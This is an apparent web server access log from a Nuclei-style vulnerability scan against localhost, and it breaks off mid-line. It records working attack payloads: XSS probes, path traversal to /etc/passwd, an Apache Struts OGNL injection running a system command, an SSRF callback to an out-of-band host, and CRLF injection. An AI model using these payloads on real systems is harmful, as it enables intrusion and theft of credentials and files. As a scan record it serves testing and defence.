AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.043","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22username\x22:\x22nuclei_29N5EikxqMTTZrS7u97IDppo09Q\x22,\x22password\x22:\x2229N5El3F2smwhCBm5N9pBzaH5MH\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interface/login/login.php?site=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/upgrade.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BSW_cxttongr.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229N5Ehpbqnze5SzuXFeZbc9Yrcz.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://ca2tuc8smpv1g2s80ca0pd1oi711ayoj5.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.155","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.135","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.134","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.135","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfi